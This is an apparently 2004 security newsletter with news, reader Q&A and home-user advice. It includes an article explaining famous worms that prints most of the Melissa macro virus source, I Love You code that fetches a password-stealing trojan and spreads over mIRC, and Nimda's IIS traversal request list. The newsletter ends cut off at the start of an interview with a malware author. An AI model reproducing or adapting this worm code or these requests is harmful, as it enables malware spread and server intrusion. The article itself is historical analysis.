|------------------------------------------| |- Astalavista Group Security Newsletter -| |- Issue 4 24 February 2004 -| |- http://www.astalavista.com/ -| |- security@astalavista.net -| |------------------------------------------| - Table of contents - [01] Introduction [02] Security News - Will computing be more secure in 2004? - Lamo pleads guilty to Times Hack - Feds seek wiretap access via VoIP - MyDoom Worm hits the net - Belgian police arrests female virus coder - Gigabyte [03] Astalavista Recommends - Breaking into computer networks from the Internet [04] Site of the Month - ReactOS.com [05] Free Security Consultation - With the appearance of Mydoom... - Hello guys.I'm confused... - What is the worst scenario... [06] Enterprise Security Issues - Known Malware Exploits Explained [07] Home Users Security Issues - Malicious Software (Malware) - How To Protect Myself [08] Meet the Security Scene - Interview with an Anonymous Malwares' Coder [09] Security Sites Review - CCMostWanted.com - Security-Forums.com - RootPrompt.org [10] Astalavista needs YOU! [11] Special Promotions - Astalavista.net [12] Final Words 01. Introduction ------------ Dear Subscribers, Welcome to Issue 4 of Astalavista's Security Newsletter! Did you enjoy your holidays? At Astalavista we did, but we also spent a great deal of time working on the new face of Astalavista.com, everyone keeps mailing us about.Thanks for the nice recommendations, we keep them in mind and already started working with several contributors that proposed major changes of the portal. So what's new? Astalavista.com is turning into a daily updated, dynamic and resourceful Security Portal; our Newsletter's subscribers have increased to more than 22,000; we are also about to launch several new sections at the site.We're sure you're going to enjoy them the way you enjoy the renovated Astalavista.com.In Issue 4 we're emphasizing on the malware problem due to the recent appearance of the MyDoom worm. You're also going to read an interesting interview with a malware coder who prefered to stay anonymous.Enjoy! We would like to hear from you! What do you think about Astalavista.com? What is your opinion about the Security Newsletter? Mail us at security@astalavista.net Meanwhile,take a look at: Astalavista's newest flash movie http://www.mediaplantage.ch/intro.swf Previous Issues of Astalavista's Security Newsletter can be found at: http://astalavista.com/index.php?section=newsletter Editor - Dancho Danchev dancho@astalavista.net Proofreader - Yordanka Ilieva danny@astalavista.net 02. Security News ------------- The Security World is a complex one.Every day a new vulnerability is found, new tools are released, new measures are made up and implemented etc. In such a sophisticated Scene we have decided to provide you with the most interesting and up-to-date Security News during the month, a centralized section that will provide you with our personal comments on the issue discussed. Your comments and suggestions about this section are welcome at security@astalavista.net ------------- [ WILL COMPUTING BE MORE SECURE IN 2004? ] Peter H. Gregory, Computerworld's columnist has written an article discussing all the major security threats and his viewpoint on their importance in 2004. More information can be found at: http://www.pcworld.com/news/article/0,aid,114066,00.asp Astalavista's Comments: Availability and increased productivity in terms of security, it has always been like that.Each new technology, no matter how useful, brings a large number of security issues with itself.Year 2004 is predicted to be one of the toughest for the Information Security industry-companies and analysts expect the Superworm, the most devastating and destructive worm created so far; CyberTerrorism activities are believed to increase as well; another issue that deserves a lot of attention is the coordination of terrorist groups over the Internet by using stenography, or sometimes even in plain text discussions. Overall, Peter H. Gregory has discussed the major trends in the IS industry for year 2004. Vigilance and education is what can minimize the damages. [ LAMO PLEADS GUILTY TO TIMES HACK ] Hacker Adrian Lamo pleaded guilty Thursday to federal computer crime charges arising from his 2002 intrusion into the New York Time internal network, and faces a likely six to twelve months in custody when he's sentenced in April. More info can be found at: http://securityfocus.com/printable/news/7771 http://www.securityfocus.com/news/340 Astalavista's Comments: Bad news for Lamo who seems to be capable, although have you ever questioned youself what is going to happen when you propose to fix a critical vulnerability in a company you've been recently trying to exploit, and the company refuses? It will all end up there. [ FEDS SEEK WIRETAP ACCESS VIA VOIP ] The FBI and the Justice Department have renewed their efforts to wiretap voice conversations carried across the Internet. More info can be found at: http://news.com.com/2100-7352_3-5137344.html Astalavista's Comments: I doubt it will be only the FBI taking advantage of wiretapping VoIP communications, it will definitely give NSA the ability to proactively monitor large VoIP networks, and, yes, they have the computer power. [ MYDOOM WORM HITS THE NET ] Another worm is in the wild, this time targeting SCO's and Microsoft's web servers.The current analyses of the worm and the monitored effects of its infections worldwide show that it's spreading very fast, hitting millions of users.The second version of the worm even blocks anti-virus software updates and the users' ability to visit security related sites, thus being able to get information on how to remove it.What is interesting to point out is that the worm completely relies on people's naivety- the e-mail consists of random subjects, bulk bodies, while it might be received from a known e-mail address, probably someone who's been infected as well.Read the e-mail, then open the attachment, nothing personal... More info can be found at: http://astalavista.com/?section=news&cmd=details&newsid=19 http://www.frame4.com/php/article1718.html http://www.frame4.com/php/modules.php?name=News&file=article&sid=1739 http://www.securitynewsportal.com/cgi-bin/cgi-script/csNews/csNews.cgi?command=viewone&id=58&database=JanDD%2edb http://www.securitynewsportal.com/cgi-bin/cgi-script/csNews/csNews.cgi?command=viewone&id=59&database=JanDD%2edb http://www.securitynewsportal.com/cgi-bin/cgi-script/csNews/csNews.cgi?command=viewone&id=66&database=JanDD%2edb Astalavista's Comments: SCO was successfully hit, the first version of the worm did its work, which means that the number of users still unaware of the dangers caused by malware isn't changing. Out of ten messages, how many did include the MyDoom worm? [ BELGIAN POLICE ARRESTS FEMALE HACKER GIGABYTE ] Belgian police arrested a 19-year-old female technology student who gained international popularity for creating computer viruses. More info can be found at: http://www.securityfocus.com/news/8048 Astalavista's Comment: How do you expect to have female geeks when you bust them? Gigabyte's biggest mistake was her publicly known image of a "female hacker", too much publicity in this case isn't good, and she's busted with the appearance of MyDoom... 03. Astalavista Recommends ---------------------- This section is unique by its idea and the information included within.Its purpose is to provide you with direct links to various white papers covering many aspects of Information Security.These white papers are defined as a "must read" for everyone interested in deepening his/her knowledge in the Security field. The section will keep on growing with every new issue.Your comments and suggestions about the section are welcome at security@astalavista.net " THE STANDARD OF GOOD PRACTICE FOR INFORMATION SECURITY " The Information Security Forum recently released this paper developed through the years and distributed among its members.240 pages discussing the major security threats organizations and companies face every day, ways for implementation and control are discussed as well.Read this one! http://www.frame4.com/exchange/standard.pdf " SECURING AND OPTIMIZING LINUX - REDHAT EDITION " Still haven't read this one?! It's extremely comprehensive and covers almost everything as far as securing a linux box(particularly a box running RedHat Linux)is concerned, from general security, to firewall configuration, SSH configuration, Tripware use, Sendmail, DNS, Web server security, all in this 486 pages document. http://www.frame4.com/exchange/secure-linux.pdf " WHAT IS INFORMATON WARFARE " Written in 1995 by Martin C. Libichki, from the National Defense University,it provides the reader with the most comprehensive explanation of each of the seven (7) types of Information Warfare. http://www.frame4.com/exchange/warfare.pdf " INTRUSION DETECTION SYSTEMS AND COMPUTER FORENSICS " A detailed presentaion about the use of IDSs in computer forensics, it will also give you an extended overview of everything you need to know about IDSs. http://www.frame4.com/exchange/ids-forensics.pdf " AN INTRODUCTION TO CYBERNETICS " From the book's preface " Many workers in the biological sciences - psychologists, psychologists, sociologists - are interested in cybernetics and would like to apply its methods and techniques to their own speciality.Many have, however, been prevented from taking up the subject of electronics and advanced pure mathematicsl for they have formed the impression that cybernetics and these subjects are inseperable." http://www.frame4.com/exchange/cybernetics.pdf 04. Site of the Month ---------------- ReactOS is an Open Source effort to develop a high-quality operating system that is compatible with WindowsNT applications and drivers. More info is available at: http://www.reactOS.com/ 05. Free Security Consultation -------------------------- Have you ever had a Security related question but you weren't sure where to direct it to? This is what the "Free Security Consultation" section was created for. Due to the high number of Security concerning e-mails we keep getting on a daily basis, we have decided to start a service free of charge, and offer it to our subscribers.Whenever you have a Security related question, you are advised to direct it to us, and within 48 hours you will receive a qualified response from one of our Security experts.The questions we consider most interesting and useful will be published at the section. Neither your e-mail, nor your name will be present anywhere. Direct all of your Security questions to security@astalavista.net We were pleasently surprised to see the number of this month's security related questions. Thanks a lot for your interest in this free security service, we are doing our best to respond as soon as possible, and provide you with an accurate answer to your questions. --------- Question: With the appearance of Mydoom, I've started having concerns on how protected my office computers are.We have seven computers, all of them have the commercial version of ZoneAlarm installed and anti-virus scanners on each of the computers, plus the gateway anti-virus scanner offered by our web hosting provider. --------- Answer: As far as protection from the outside is concerned, the measures you have in place are reasonable for the small office network that you have.This, of course, doesn't mean that malware couldn't enter in your network; something else you should seriously consider evaluating is your staff members' awareness of viruses, trojans and worms.Do they know how to protect themselves by not opening an attachment they received, even when it's coming from a friend? Peer-to-Peer software and acccess should be blocked as well; due to a lot of malware spreads through these, your staff is again exposed to a possible infection. -------- Question: Hello guys.I'm confused, I believe I can take care of the security of my computer, but I cannot do anything when a friend that has my e-mail in his/her address books infects with a worm that distributes itself using my e-mail address.As a result, I'm getting quite a lot of e-mails from anti-virus scanners that have blocked my e-mails and e-mails from postmasters that I'm infected with a worm. -------- Answer: A personal recommendation to all the admins out there, in times of worms spreading around, please turn off the gateway anti-virus notification when a virus is discovered in the message :-) You can't control who adds your e-mail in his/her address book the same way you can't control which spammer can add your e-mail in the e-mails database.If you're that seriously taking care of your friends' security, provide them with articles related to protection againsts malware, with the idea to educate them. -------- Question: What is the worst scenario as far as these worms are concerned? -------- Answer: I'm sure every security expert or even a computer enthusiast out there can point out at least five possible scenarios, but consider the following one - what will be the impact of a worm spreading faster than the Slammer worm which scanned several billion IP addresses in less than 15 minutes, with the destruction capabilities of the CIH virus? 06. Enterprise Security Issues -------------------------- In today's world of high speed communications, of companies completely relying on the Internet for making business and increasing productivity, we have decided that there should be a special section for corporate security, where advanced and highly interesting topics will be discussed in order to provide that audience with what they are looking for - knowledge! In this issue, we've included an article contributed by Abhishek Bhuyan.It gives an overview of the most common malware released by now, comments on its source code are included as well. Known Malware Exploits Explained by Abhishek Bhuyan http://www.lucky-web.net/ Intruders who access networks and systems without authorization, or inside attackers with malicious motives, can plant various types of programs to cause damage to the network. These programs often lumped together under the general term viruses, although other varieties have cost companies and individuals billions of dollars in lost data,lost productivity,and the time and expense of recovery. Some of the more destructive examples of malicious code, also sometimes referred to as malware [MALicious softWARE - mark the uppercase MALWARE] over the past decade, are: - CIH/Chernobyl - In the late 1990s, this virus caused a great deal of damage to business and home computer users.It infected executable files and was spread by running an infected file on a Windows 95/98 machine. There were several variants of CIH; these were "time bomb" viruses that were activated on a predefined date (either April 26-the anniversary of the Chernobyl disaster or every month on the 26th). Until the trigger date, the virus remained dormant. Once the computer's internal clock indicated the activation date, the virus would overwrite the first 2048 sectors of every hard disk in the computer,thus wiping out the file's allocation table and causing the hard disk to appear to be erased. However, the data on the rest of the disk could be recovered using data recovery software; many users were unaware of this capability. The virus also attempted towrite to the basic input output system (BIOS) boot block, rendering the computer unbootable. (This did not work on computers that had been set to prevent writing to the BIOS.) This virus started to show up again in the spring of 2002, piggybacking on the Klez virus. - Melissa - This was the first virus to be widely disseminated via e-mail, starting in March 1999. It is a macro virus, written in Visual Basic for Applications (VBA) and embedded in a Microsoft Word 97/2000 document. When the infected document is opened, the macro runs (unless Word is set not to run macros), sending itself to the first 50 entries in every Microsoft Outlook MAPI address book. These include mailing list addresses, which could result in a very rapid propagation of the virus. The virus also made changes to the Normal.dot template, which caused newly created Word documents to be infected. Because of the huge volume of mail it produced, the virus caused a denial of service (DoS) on some e-mail servers. The confessed author of the virus, David Smith, was sentenced to 20 months in federal prison and fined $5,000. - Code Red - In the summer of 2001, this self-propagating worm began to infect Web servers running Internet Information Server (IIS). On various trigger dates, the infected machine would try to connect to TCP port 80 (used for Web services) on computers with randomly selected IP addresses. When successful, it attempted to infect the remote systems. Some variations also defaced Web pages stored on the server. On other dates, the infected machine would launch a DoS attack against a specific IP address embedded in the code. CERT reported that Code Red infected over 250,000 systems over the course of nine hours on July 19, 2001. - Nimda - In the late summer of 2001, the Nimda worm infected numerous computers running Windows 95/98/ME, NT, and 2000.The worm made changes to Web documents and executable files on the infected systems and created multiple copies of itself.It spread via e-mail, via network shares, and through accessing infected Web sites. It also exploited vulnerabilities in IIS versions 4 and 5 and spread from client machines to Web servers through the back doors left by the Code Red II worm.Then Nimda allowed attackers to execute arbitrary commands on IIS machines that had not been patched, and DoS attacks were caused by the worm's activities. - Klez - In late 2001 and early 2002, this e-mail worm spread throughout the Internet. It propagates through e-mail mass mailings and exploits vulnerabilities in the unpatched versions of Outlook and Outlook Express mail clients, attempting to run when the message containing it is previewed. When it runs, it copies itself to the System or System32 folder in the system root directory and modifies a registry key to cause it to be executed when Windows is started.It also tries to disable any virus scanners and sends copies of itself to addresses in the Windows address book, in the form of a random filename with a double extension (for example, file.doc.exe). The payload executes on the 13th day of every other month, starting with January, resulting in files on local and mapped drives being set to 0 bytes. Now I'm going to explain about the 3 most popular malwares - some exploits which these malwares used, but NOT how the whole code worked or how to code a malware to exploit. I'm not that genious :-) "Melissa" , "I Love You" and "Nimda" Worms - Melissa Worm - These two macro viruses/worms had a widespread impact on computer systems that was borderline chaotic. The associated amount of damages in dollars(nearly $8 billion) is borderline absurd. What made these worms so effective? Both Melissa and I Love You used the victim's address book as the next round of victims. Since the source of the e-mail appears to be someone you know, a certain "trust" is established that causes the recipients to let their guard down. Melissa is actually a fairly simple and small macro virus. In an effort to show how simple a worm can be, let's go through exactly what Melissa comprises: Private Sub Document_Open()On Error Resume Next Melissa works by infecting the Document_Open() macro of Microsoft Word files. Any code placed in the Document_Open() routine is immediately run when the user opens the Word file. That said, Melissa propagates by users opening infected documents, which are typically attached in an e-mail. If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then CommandBars("Macro").Controls("Security...").Enabled = False System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& Else CommandBars("Tools").Controls("Macro").Enabled = False Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):Options.SaveNormalPrompt = (1 - 1) End If Here Melissa makes an intelligent move -> It disables the macro security features of Microsoft Word. This allows it to continue unhampered, and avoid alerting the end user that anything is going on. Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice Set UngaDasOutlook = CreateObject("Outlook.Application") Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI") Messaging API (MAPI) is a way for Windows applications to interface with various e-mail functions (which is usually provided by Microsoft Outlook, but there are other MAPI-compliant e-mail packages available). If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\ Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Melissa includes a failsafe,i.e it has a way to tell if it has already run, or 'infected' this host. For Melissa in particular, this is setting the preceding Registry key to the indicated value. At this point, if the key is not set, it means Melissa has not yet run, and should go about executing its primary payload. If UngaDasOutlook = "Outlook" Then DasMapiName.Logon "profile", "password" For y = 1 To DasMapiName.AddressLists.Count Set AddyBook = DasMapiName.AddressLists(y) x = 1 Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0) For oo = 1 To AddyBook.AddressEntries.Count Peep = AddyBook.AddressEntries(x) BreakUmOffASlice.Recipients.Add Peep x = x + 1 If x > 50 Then oo = AddyBook.AddressEntries.Count Next oo Here we see Melissa checking to see if the application is Microsoft Outlook, and if so, composing a list of the first 50 e-mail addresses found in the user's address book. BreakUmOffASlice.Subject = "Important Message From " & Application .UserName BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)" BreakUmOffASlice.Attachments.Add ActiveDocument.FullName BreakUmOffASlice.Send This is the code that actually sends the e-mail to the 50 addresses previously found. You can see the subject, which is personalized using the victim's name. You can also see that Melissa simply attaches itself to the e-mail in one line, and then one more command sends the message. Peep = "" Next y DasMapiName.Logoff End If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo" End If Finally, the sending is wrapped up, and to make sure we do not keep sending all these e-mails, Melissa sets the failsafe by creating a Registry entry (which is checked for earlier in the code). Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1) Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1) NTCL = NTI1.CodeModule.CountOfLines ADCL = ADI1.CodeModule.CountOfLines BGN = 2 If ADI1.Name <> "Melissa" Then If ADCL > 0 Then ADI1.CodeModule.DeleteLines 1, ADCL Set ToInfect = ADI1 ADI1.Name = "Melissa" DoAD = True End If If NTI1.Name <> "Melissa" Then If NTCL > 0 Then NTI1.CodeModule.DeleteLines 1, NTCL Set ToInfect = NTI1 NTI1.Name = "Melissa" DoNT = True End If If DoNT <> True And DoAD <> True Then GoTo CYA Here Melissa checks to see if the active document and document template (normal.dot) are infected; if they are, it will jump down to the exit code ("GoTo CYA"). If they are not, then it will infect them: If DoNT = True Then Do While ADI1.CodeModule.Lines(1, 1) = "" ADI1.CodeModule.DeleteLines 1 Loop ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()") Do While ADI1.CodeModule.Lines(BGN, 1) <> "" ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1) BGN = BGN + 1 Loop End If If DoAD = True Then Do While NTI1.CodeModule.Lines(1, 1) = "" NTI1.CodeModule.DeleteLines 1 Loop ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()") Do While NTI1.CodeModule.Lines(BGN, 1) <> "" ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1) BGN = BGN + 1 Loop End If The document infection code. Here we see Melissa modifying the Document_Open() function of the active document. We also see that the Document_Close() function of the document template was modified-this means every new document created, upon closing or saving, will run the Melissa worm. CYA: If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then ActiveDocument.Saved = True End If Here Melissa finishes by saving the current active document, making sure a copy of itself has been successfully stored. 'WORD/Melissa written by Kwyjibo 'Works in both Word 2000 and Word 97 'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide! 'Word -> Email | Word 97 <--> Word 2000 ... it's a new age! If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here." End Sub - I Love You Worm - The I Love You virus is a little more bulky, so I chose not to include the entire script here. You can download all of the I Love You source from: http://www.packetstormsecurity.org/viral-db/love-letter-source.txt What is interesting to note about the I Love You virus is that it randomly changed the user's default Web browser homepage to one of four locations, as seen here by the code: num = Int((4 * Rnd) + 1) if num = 1 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page",http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTF wetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe elseif num = 2 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page",http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGF ikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe elseif num = 3 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page",http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFE kbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe elseif num = 4 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page",http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJB hAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234 iuy7thjg/WIN-BUGSFIX.exe end if end if The WIN-BUGSFIX.exe turned out to be a Trojan application designed to steal passwords. Now, a quick look notices all of the URLs present are on www.skyinet.net. This resulted in many places simply blocking access to that single host. While bad for skyinet.net, it was an easy fix for administrators. Imagine if the virus creator has used more popular hosting sites, such as the members' homepages of aol.com, or even made reference to large sites, such as yahoo.com and hotmail.com ; would administrators rush to block those sites as well? Perhaps not. Also, had someone at skyinet.net been smart, they would have replaced the Trojan WIN-BUGSFIX.exe with an application that would disinfect the system of the I Love You virus. That is, if administrators allowed infected machines to download the "Trojaned Trojan." I Love You also modifies the configuration files for mIRC, a popular Windows IRC chat client: if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then set scriptini=fso.CreateTextFile(folderspec&"\script.ini") scriptini.WriteLine "[script]" scriptini.WriteLine ";mIRC Script" scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will" scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks" scriptini.WriteLine ";" scriptini.WriteLine ";Khaled Mardam-Bey" scriptini.WriteLine ";http://www.mirc.com" scriptini.WriteLine ";" scriptini.WriteLine "n0=on 1:JOIN:#:{" scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }" scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER- FOR-YOU.HTM" scriptini.WriteLine "n3=}" scriptini.close Here we see I Love You making a change that would cause the user's IRC client to send a copy of the I Love You virus to every person who joins a channel that the user is in. Of course, the filename has to be enticing to the users joining the channel, so they are tempted into opening the file. - Nimda Worm - The coolest one ! In September 2001 a very nasty worm reared its ugly head. The Nimda (Just reverse nimda and you get admin) worm, also called the Concept virus, was another worm, which propagated via Microsoft hosts. Nimda featured multiple methods to infect a host: It could send itself via e-mail. It would attach itself as an encoded .exe file, but would use an audio/x-wave Multipurpose Internet Mail Extensions (MIME) type, which triggered a bug in Internet Explorer to automatically execute the attachment upon previewing the e-mail. Once the attachment was executed, the worm would send itself to people in the user's address book as well as e-mail addresses found on Web pages in Internet Explorer's Web page cache-that means the worm would actually find e-mail addresses on recently browsed Web pages! The worm would scan for vulnerable IIS machines, looking for the root.exe files left over from the Code Red II and Sadmind worms, as well as using various Unicode and double-encoding URL tricks in order to execute commands on the server.The following is a list of requests made by the worm: GET /scripts/root.exe?/c+dir GET /c/winnt/system32/cmd.exe?/c+dir GET /d/winnt/system32/cmd.exe?/c+dir GET /MSADC/root.exe?/c+dir GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir Once the worm found a vulnerable IIS server, it would attempt to Trivial File Transfer Protocol (TFTP) the worm code to the target server. It would also modify the IIS server by creating a guest account and adding it to the Administrators' group.It would also create a Windows share of the C: drive (using the name C$). All local hypertext markup language (HTML) and Application Service Provider (ASP) files would be modified to include the following code snippet: In addition, the worm would copy itself to the readme.eml file. The final result was that unsuspecting Web surfers would automatically download, and possibly execute, the worm from an infected Web site. The worm copies itself into .EML and .NWS in various local and network directories. If an unsuspecting user uses Windows Explorer to browse a directory containing these files, it is possible that the automatic preview function of Explorer would automatically execute the worm. This would allow the worm to propagate over file shares on a local network. The worm also copies itself to riched.dll, which is an attempt to Trojan Microsoft Office documents, since documents opened in the same directory as the riched.dll binary will load and execute the Trojan DLL. The end result was a noisy, but very effective, worm. It was noisy because it created many .EML and .NWS files on the local system. It also modified Web pages on the Web site, which made it easy to remotely detect a compromised server. But the multi-infection methods proved quite effective, and many people who had run through and removed the worm had found that their systems kept getting infected-it is a tough worm to fully eradicate! To properly combat it, the security administrator needed to patch their IIS server, upgrade their Microsoft Outlook client, and be cautious of browsing network shares. Full information on the Nimda worm is available in the Security Focus analysis http://aris.securityfocus.com/alerts/nimda/010921-Analysis-Nimda-v2.pdf Some tips on prevention and response: --------------------------------------------- Protecting systems and networks from the damage caused by Trojan horses, viruses, and worms is mostly a matter of common sense. Practices that can help prevent infection include the following: - Do not run executable (.EXE) files from unknown sources, including those attached to an e-mail or downloaded from Web sites. - Turn off the Preview and/or HTML mail options in the e-mail client program. - Do not open Microsoft Office documents from unknown sources without first disabling macros. - Be careful about using diskettes that have been used in other computers. - Install and use firewall software. - Install antivirus software, configuring it to run scans automatically at predefined times and updating the definition files regularly. - Use intrusion prevention tools called behavior blockers that deny programs the ability to execute operations that have not been explicitly permitted. - Use behavior detection solutions such as Finjan's SurfinGate and SurfinShield that can use investigative techniques to analyze executable files and assess whether they are likely to be hostile. http://www.finjan.com/products/surfingate.cfm - Use integrity checker software (such as Tripwire) to scan the system for changes. - Recognizing the presence of a malicious code is the first-response step if a system gets infected. Administrators and users need to be on the alert for common indications that a virus might be present, such as the following: Missing files or programs Unexplained changes to the system's configuration Unexpected and unexplained displays, messages, or sounds New files or programs that suddenly appear with no explanation Memory "leaks" (less available system memory than normal) Unexplained use of disk space Any other odd or unexplained behavior of programs or the operating system If a virus is suspected, a good antivirus program should be installed and run to scan the system for viruses and attempt to remove or quarantine any that are found. Finally, all mission-critical or irreplaceable data should be backed up on a regular basis in case all these measures fail. Virus writers are a creative and persistent bunch and will continue to come up with new ways to do the "impossible," so computer users should never assume that any particular file type or OS is immune to malicious code. The only sure way to protect against viruses is to power down the computer and leave it turned off :-) Information about specific viruses and instructions on how to clean an infected system is available at www.symantec.com and www.mcafee.com. Both antivirus vendors provide detailed databases that list and describe known viruses. But I recommend being in touch with the site http://www.securitynewsportal.com/ (one of my favourite). Here you will get hourly updates about latest security, hacking, virus and trojan news. And, of course, http://astalavista.net/ ! 07. Home Users Security Issues -------------------------- Due to the high number of e-mails we keep getting from novice users, we have decided that it would be a very good idea to provide them with their very special section, discussing various aspects of Information Security in an easy to understand way, while, on the other hand, improve their current level of knowledge. If you have questions or recommendations for the section, direct them to security@astalavista.net Enjoy yourself! - Malicious Code (Malware) - How To Protect Myself - The recent appearance of the MyDoom Worm, and the attacks on SCO's web site (http://sco.com), has again opened the discussion on the end user's education and awareness of malicious software. Basically, worms like the MyDoom one target the home users instead of the corporate ones, but why? The worm's aim in this case is to infect as many home users as possible, then use their connection's bandwith in order to launch an attack on SCO's web site, simultaneously and in coordination with all the victims.Don't get me wrong, a lot of Fortune 500 companies have problems with the worm as well, due to the fact that it spreads via .zip attachments which are commonly used in the corporate environment for both sending and receiving large attachments, but who do you think has a greater chance of infection- the corporate end user protected by the company's gateway content filtering and anti-virus software, or the home user who sometimes doesn't even have a reliable firewall installed on his/her computer? Corporate users, of course, got infected as well, insecure laptop maintainance, personal correspondance through the corporate's e-mail and many other factors contributed to the aforesaid problems with Fortune 500 companies. - How powerful are worms? - Worms' networks are one of the most powerful DDoS (Distributed Denial of Sercive) attack tools, creating a network with thousands of "participants" who will use their bandwith, which in most of the cases is an "always-on" connection. Simultaneously attacking the given target, having a network of litellary thousands of infected computers, will allow the attacker to shut down any site worldwide. The I LOVE YOU worm is believed to have caused billions of damages worldwide, in the above-mentioned article "Known Malware Exploits Explained" you can read more about the most famous and destructive worms released so far. - How can I get infected? - The majority of Internet Worms targeting end users, usually spread via e-mail and IRC, and those targeting companies' networks and servers spread via IP scanning, file shares, auto-exploiting a known/unknown vulnerability. Due to its nature, the e-mail is the most commonly used method of spreading in the wild.Here we'll discuss several scenarios: - Using outdated software One of the worst scenarios is when you're using an outdated software, namely a software that has at least one publicly known vulnerability. And when this software happens to be the browser or the e-mail client you're using, then it's just a matter of time for someone to exploit the vulnerability, which in most of the cases consists of auto-execution of a file sent to your e-mail, just by viewing the message. Refer to your vendor's web site at least once per week to check with the latest vulnerabilities. Sometimes the vulnerability is known to the public, while the vendor cannot respond with a patch as soon as it's expected to do so. - Lack of awareness There's still a large number of home users who don't make a distinction between a virus, trojan and a worm, they are unaware of the sender's real intentions and the world epidemy they'll become part of, just executing the attachment sent to their mailboxes. Realize the consequences of your actions both to your home computer and to the millions of Internet users worldwide, it's everyone's responsibility. - Lack of an anti-virus software and a stable firewall Although anti-virus scanners cannot gurantee 100% protection against viruses, trojans and worms, they're a "must have", because they eliminate a large number of known dangerous programs- sometimes the attack might come from an attack targeting especially users who don't even have an anti-virus scanner. Getting infected by the latest fast-spreading worm is something else, but getting infected by a malware that's been into the product's database of signatures for the past half an year is another story. Something else to consider is that having an anti-virus scanner that is not regularly updated (on a weekly basis) will only give you a false sense of security. Having a decent firewall will also increase your protection, but bear in mind that the firewall should be properly configured - there're certain firewalls that automatically configure themselves and are created for novice Internet users. These will work OK, as soon as you don't let a malware make a connection to the outside world (the Internet). A list of various Windows based firewalls can be located here: http://www.firewallguide.com/software.htm A paper entitled The Complete Windows Trojans Paper (http://www.astalavista.com/media/files/comp_trojans.txt) fully discussed the various ways in which you can get infected by either a trojan or a worm. - How can I protect myself? - - The logical approach Question yourself, how come am I receiving an e-mail from someone I don't know, that contains nothing but bulk characters, and an attachment with a strange extension? How come am I receiving an e-mail from John, my colleague in Chicago's branch, that doesn't even include his signature, or at least a personal message, but just an attachment? I'd better mail/call him, lose several minutes, but verify what is going on, if it's a malware, he could immediatelly contact their Information Security Office for futher actions. Don't be naive, you won't get rich by forwarding an e-mail, you won't fall in love because of forwarding an e-mail, but you might get youself and a countless number of other people in trouble. Don't fall a victim because of your naivety! 08. Meet the Security Scene ----------------------- In this section you are going to meet famous people, security experts and all the folks who in some way contribute to the growth of the community. We hope that you will enjoy these interviews and that you will learn a lot of interesting information through this section. In this issue we have interviewed an anonymous malwares' coder that requested this interview due to the appearance of the MyDoom Worm. He insisted in giving us this interview, due to his long-term expertise in this field; we, of course, doublechecked how experienced he is, and were pretty surprised when we found out more info on his worms etc. In a time of worms' spreading around the Internet on a daily basis, we believe you're going to enjoy this interview. Something else to consider before mailing us about it is that we don't have his e-mail, or any of his contacts due to obvious reasons. The interview was conducted following the coder's personal views of anonymity. Your comments are appreciated at security@astalavista.net ------------------------------------------------ Interview with an Anonymous Malwares' Coder Astalavista: Before we start, I think it would be better if you pick up a random name, so I can at least call you in some way :) Malwares' Coder: Doesn't 